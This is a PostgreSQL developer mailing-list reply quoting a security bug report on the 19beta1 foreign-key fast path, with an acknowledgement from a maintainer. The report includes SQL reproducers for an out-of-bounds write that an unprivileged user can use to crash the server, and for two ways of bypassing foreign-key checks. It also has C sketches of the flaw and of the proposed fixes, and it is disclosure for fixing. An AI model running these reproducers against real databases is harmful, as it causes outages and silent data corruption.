Re: PG19 FK fast path: OOB write and missed FK checks during batched

From: Amit Langote <amitlangote09(at)gmail(dot)com>
To: Nikolay Samokhvalov <nik(at)postgres(dot)ai>
Cc: pgsql-hackers mailing list <pgsql-hackers(at)postgresql(dot)org>, Andrey Borodin <amborodin(at)acm(dot)org>, Kirk Wolak <wolakk(at)gmail(dot)com>
Subject: Re: PG19 FK fast path: OOB write and missed FK checks during batched
Date: 2026-06-06 09:13:15
Message-ID: CA+HiwqGTOwRqkgrhqq6-nLyVGfGuAHMfoo+Ob2A4Z98ZkgwCmg@mail.gmail.com
Lists: pgsql-hackers

On Sat, Jun 6, 2026 at 17:31 Nikolay Samokhvalov <nik(at)postgres(dot)ai> wrote:

> Hi hackers,
>
>
> The new FK existence-check fast path in ri_triggers.c (ri_FastPath*) runs
> user-defined code in the middle of a deferred batch flush, which yields at
> least three defects reachable by an unprivileged table owner. Present in
> master and verified in REL_19_BETA1.
>
>
> I identified these issues during recent security research with LLMs. Although
> they have clear security implications (OOB write, integrity bypass), I am
> reporting them here because they are isolated to 19beta1 and absent in PG18
> and earlier. I don't have patches, only reproducers.
>
>
> Mechanism:
>
>
> For an INSERT/UPDATE on the referencing side the fast path buffers rows
> in a transaction-lived cache (ri_fastpath_cache, keyed by pg_constraint
> OID) and probes the PK index in groups, flushing when a per-constraint
> buffer reaches RI_FASTPATH_BATCH_SIZE (64) or when the trigger-firing pass
> ends (ri_FastPathEndBatch, an AfterTriggerBatchCallback). For a cross-type
> FK the flush calls the
> column's cast function (ri_FastPathFlushArray, the FunctionCall3 at line
> 3069) and the equality operator -- arbitrary user code, mid-flush. Line
> numbers below are from a REL_19_BETA1 build (commit 4b0bf07).
>
>
> Unprivileged vehicle (defects 1 and 3). No superuser, no contrib: a role creates
> a type it owns and an IMPLICIT cast from it to the PK type with a PL/pgSQL
> function, which ri_HashCompareOp wires into the fast path's cast slot. The
> examples below use a composite type. Default btree opclass, ordinary
> single-column
> FK, no GUC (fast path is unconditional for non-partitioned, non-temporal
> FKs, per ri_fastpath_is_applicable).
>
>
>
> 1) ri_FastPathBatchAdd (line 2859): out-of-bounds write on re-entry
>
>
> The write precedes the bound check, and batch_count is reset to 0 only at end
> of flush (ri_FastPathBatchFlush, line 2971), so it is 64 throughout a full-batch
> flush:
>
>
>     fpentry->batch[fpentry->batch_count] = ExecCopySlotHeapTuple(newslot);
>     fpentry->batch_count++;
>     if (fpentry->batch_count >= RI_FASTPATH_BATCH_SIZE)
>         ri_FastPathBatchFlush(fpentry, fk_rel, riinfo);
>
>
> There is no re-entrancy guard and ri_FastPathGetEntry returns the same entry,
> so user code that does DML on the same table during a full-batch flush
> re-enters with batch_count == 64 and writes batch[64], one past the array,
> overwriting the adjacent batch_count field (struct layout, lines 250-251).
> A single re-entrant row only stomps batch_count, which is then reset to 0
> before reuse; the crash manifests once the re-entrant insert is itself large
> enough to fill and flush a batch, so the stomped batch_count is used as an
> array index (batch[garbage]) and as nvals in memset(matched, 0,
> nvals * sizeof(bool)) (line 3054).
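
The ordering problem described above can be reproduced in a small standalone model. This is only a sketch, not the ri_triggers.c code: ModelEntry, model_add and model_flush are hypothetical names, rows are plain ints, and the model counts the out-of-range store instead of performing it, so the program itself stays well defined.

```c
#include <assert.h>

#define BATCH_SIZE 64   /* stands in for RI_FASTPATH_BATCH_SIZE */

/* Hypothetical stand-in for the per-constraint cache entry. */
typedef struct ModelEntry
{
    int batch[BATCH_SIZE];
    int batch_count;
    int reentrant_rows;   /* rows that "user code" inserts during a flush */
    int oob_attempts;     /* stores that would have landed on batch[64] */
} ModelEntry;

static void model_flush(ModelEntry *e);

/* Same shape as the quoted snippet, plus a detector in place of the bad store. */
static void
model_add(ModelEntry *e, int row)
{
    if (e->batch_count >= BATCH_SIZE)
    {
        /* The reported code has no such test and would write batch[64] here. */
        e->oob_attempts++;
        return;
    }
    e->batch[e->batch_count] = row;
    e->batch_count++;
    if (e->batch_count >= BATCH_SIZE)
        model_flush(e);
}

/* batch_count stays at BATCH_SIZE until the very end of the flush. */
static void
model_flush(ModelEntry *e)
{
    int n = e->reentrant_rows;

    assert(e->batch_count == BATCH_SIZE);
    e->reentrant_rows = 0;              /* the nested insert fires only once */
    for (int i = 0; i < n; i++)
        model_add(e, 1000 + i);         /* re-entry on the same entry */
    e->batch_count = 0;                 /* reset only after "user code" ran */
}
```

Filling a zero-initialized entry with 64 rows while reentrant_rows is 1 leaves oob_attempts at 1: the nested call arrives while batch_count is still 64. The model stops there; in the reported code the store goes ahead and the subsequent increment operates on whatever the store left in batch_count.
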
>
>
> Reproduction (non-superuser; reliable SIGSEGV on --enable-cassert -O0;
> under -O2 the effect of the out-of-bounds write is undefined):
>
>
> create table parent(id int primary key);
> insert into parent select g from generate_series(1,2000) g;
> create type vch as (v int);
> create function vcast(vch) returns int language plpgsql as $$
> begin
>   if $1.v = 64 then
>     insert into child select row(g)::vch from generate_series(1001,1064) g;
>   end if;
>   return $1.v;
> end$$;
> create cast (vch as int) with function vcast(vch) as implicit;
> create table child(a vch);
> alter table child add constraint child_fkey
>   foreign key (a) references parent(id);
> insert into child select row(g)::vch from generate_series(1,64) g;  -- crash
> -- gdb: crash at ri_FastPathBatchAdd line 2866 with batch_count holding a
> -- stomped HeapTuple pointer's low bits, i.e. batch[64] overwrote
> -- batch_count; backend SIGSEGVs and the cluster restarts.
>
>
>
> 2) ri_FastPathSubXactCallback (line 4208): batch dropped on subxact abort
>
>
> On SUBXACT_EVENT_ABORT_SUB the callback discards the whole cache:
>
>
>     ri_fastpath_cache = NULL;
>     ri_fastpath_callback_registered = false;
>
>
> But batch[] holds outstanding rows of the enclosing transaction, not the aborting
> subxact. An internal subxact abort during after-trigger firing (PL/pgSQL
> BEGIN ... EXCEPTION) drops the buffered rows unflushed; their FK checks
> never run and orphans commit behind a constraint that still reports itself
> valid. No cast needed:
>
>
> create table pk(id int primary key);
> create table fk(a int, tag text);
> insert into pk select g from generate_series(1,10) g;
> alter table fk add constraint fk_a_fkey foreign key (a) references pk(id);
> create function abort_subxact() returns trigger language plpgsql as $$
> begin
>   if NEW.tag = 'boom' then
>     begin perform 1/0; exception when others then null; end;
>   end if;
>   return NEW;
> end$$;
> create trigger fk_after after insert on fk
>   for each row execute function abort_subxact();
> insert into fk values (999,'bad'),(0,'boom'),(1,'ok'),(2,'ok'),(3,'ok');
> -- INSERT 0 5, no error
> select f.a from fk f left join pk p on f.a=p.id where p.id is null;
> --   a
> -- -----
> --  999
> --    0   (orphans)
>
> -- the constraint still reports itself valid, and re-validation passes
> -- while the orphans remain:
> select convalidated from pg_constraint where conname = 'fk_a_fkey';
> --  convalidated
> -- --------------
> --  t
> alter table fk validate constraint fk_a_fkey;
> -- ALTER TABLE (succeeds; does not re-scan committed rows)
> select f.a from fk f left join pk p on f.a=p.id where p.id is null;
> -- 999, 0 (orphans still present)
>
>
> Controls (no EXCEPTION; between-statement SAVEPOINT; DEFERRABLE INITIALLY DEFERRED)
> all behave correctly (FK violation raised, no orphans). The whole statement's
> buffered batch is discarded, not just the aborting row's check. The abort
> path also emits "WARNING: resource was not closed" (relation / index /
> TupleDesc), a resource leak consistent with the missing flush.
>
>
>
> 3) ri_FastPathEndBatch (line 4133): cross-table re-entry drops a check
>
>
> EndBatch flushes by iterating the cache with hash_seq_search (line 4143). If
> flush-time user code INSERTs into a different fast-path FK table, ri_FastPathGetEntry
> adds a new cache entry mid-scan; it can land in a bucket hash_seq_search
> already passed and is never reached. ri_FastPathTeardown (line 4165) then
> hash_destroys the cache (line 4188) without flushing entries that still
> have batch_count > 0, so that buffered check is discarded. This survives a
> per-entry guard for [1] (different entry, not a re-entry of the busy one):
>
>
> create table parent(id int primary key);
> insert into parent select g from generate_series(1,64) g;
> create table child2(a int);
> alter table child2 add constraint child2_fkey
>   foreign key (a) references parent(id);
> create type vch as (v int);
> create function vcast(vch) returns int language plpgsql as $$
> begin
>   if $1.v = 1 then
>     insert into child2 values (999999);  -- orphan into a *different* FK
>   end if;
>   return $1.v;
> end$$;
> create cast (vch as int) with function vcast(vch) as implicit;
> create table child(a vch);
> alter table child add constraint child_fkey
>   foreign key (a) references parent(id);
> insert into child values (row(1)::vch);  -- flushed at ri_FastPathEndBatch
> select a from child2 where a not in (select id from parent);  -- => 999999
> -- control: INSERT INTO child2 VALUES (999999); -- correctly raises FK error
>
>
>
> Root cause / thoughts:
>
>
> All three stem from invoking user cast/operator code inside a deferred batch
> flush: while a per-entry batch is half-updated [1], while a cache-wide hash_seq_search
> is in progress and teardown drops non-empty entries [3], and against a
> subxact-abort invalidation that cannot tell parent-xact rows from aborted-subxact
> rows [2].
>
>
> - [1] Bound-check before the write in ri_FastPathBatchAdd, and add a "flushing"
> flag to RI_FastPathEntry, rejecting re-entrant modification of a busy
> entry (a nested per-row probe is unsafe: the flush may hold PK-index buffer
> locks).
>
> - [3] Loop-flush in ri_FastPathEndBatch until no entry has batch_count >
> 0, and/or flush non-empty entries in ri_FastPathTeardown before
> hash_destroy.
>
> - [2] Do not discard outstanding parent-xact rows on
> SUBXACT_EVENT_ABORT_SUB; track the buffering subxact, or flush
> immediate-constraint batches at subxact boundaries.
>
> - Unifying: a global "in fast-path flush" guard routing any re-entrant FK check
> to the immediate per-row path, and reconsidering running user code mid-flush
> at all.
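
The suggestions for [1] and [3] can be sketched together in a standalone model. Everything here is an assumption made for illustration, not the ri_triggers.c code: SketchEntry, SketchCache and the sketch_* functions are hypothetical names, a fixed array scanned in order stands in for the dynahash cache, and a function pointer stands in for the user cast/operator code.

```c
#include <assert.h>
#include <stdbool.h>

#define BATCH_SIZE  64   /* stands in for RI_FASTPATH_BATCH_SIZE */
#define MAX_ENTRIES 8    /* hypothetical: fixed array instead of a hash table */

typedef struct SketchCache SketchCache;

typedef struct SketchEntry
{
    int  batch[BATCH_SIZE];
    int  batch_count;
    bool flushing;                   /* the proposed "flushing" flag */
} SketchEntry;

struct SketchCache
{
    SketchEntry entries[MAX_ENTRIES];
    int  nentries;
    int  checked;                    /* rows whose check actually ran */
    void (*user_code)(SketchCache *cache, int row);   /* cast/operator hook */
};

static void sketch_flush(SketchCache *cache, SketchEntry *e);

/* [1]: test before storing; false means "use the per-row path instead". */
static bool
sketch_add(SketchCache *cache, SketchEntry *e, int row)
{
    if (e->flushing || e->batch_count >= BATCH_SIZE)
        return false;
    assert(e->batch_count < BATCH_SIZE);
    e->batch[e->batch_count++] = row;
    if (e->batch_count >= BATCH_SIZE)
        sketch_flush(cache, e);
    return true;
}

static void
sketch_flush(SketchCache *cache, SketchEntry *e)
{
    int n = e->batch_count;

    e->flushing = true;
    for (int i = 0; i < n; i++)
    {
        if (cache->user_code)
            cache->user_code(cache, e->batch[i]);   /* may buffer more rows */
        cache->checked++;
    }
    e->batch_count = 0;
    e->flushing = false;
}

/* One in-order pass, like a single scan; returns the entries it flushed. */
static int
sketch_flush_pass(SketchCache *cache)
{
    int flushed = 0;

    for (int i = 0; i < cache->nentries; i++)
        if (cache->entries[i].batch_count > 0)
        {
            sketch_flush(cache, &cache->entries[i]);
            flushed++;
        }
    return flushed;
}

/* [3]: repeat passes until a pass finds nothing left to flush. */
static void
sketch_end_batch(SketchCache *cache)
{
    while (sketch_flush_pass(cache) > 0)
        ;
}

/* Example hook: while row 1 is checked, buffer a row into entry 0. */
static void
sketch_hook_cross_insert(SketchCache *cache, int row)
{
    if (row == 1)
        (void) sketch_add(cache, &cache->entries[0], 999999);
}
```

With two entries and sketch_hook_cross_insert installed, buffering row 1 into entries[1] and running a single sketch_flush_pass leaves entries[0] holding one unchecked row, which is the shape of defect 3; sketch_end_batch drains it. A real version would also need some bound on the loop, since user code could keep buffering rows indefinitely.
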
>
>
> Nik
>

Thanks for the detailed report and reproducers. I’ve started looking into
this.

- thanks, Amit

